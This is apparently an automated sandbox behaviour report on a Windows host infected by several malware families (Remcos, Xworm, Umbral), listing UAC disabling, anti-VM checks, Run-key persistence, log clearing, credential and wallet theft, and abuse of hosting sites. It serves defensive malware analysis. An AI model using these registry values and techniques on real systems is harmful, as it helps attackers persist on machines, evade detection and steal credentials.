PID 5476 created 4388 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
PID 5476 created 6052 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
PID 5476 created 5516 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
PID 5476 created 4016 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5476 created 2976 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xworm

trojan rat xworm

Xworm family

xworm

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\ruts\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\devtun\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe N/A
File opened for modification C:\Windows\System32\Tasks\MicrosoftProfile C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\11.reg C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\rutserv.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\boleto C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\xda C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\rfusclient.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\libeay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\rutssvc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\devtun\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus C:\Windows\System32\dllhost.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
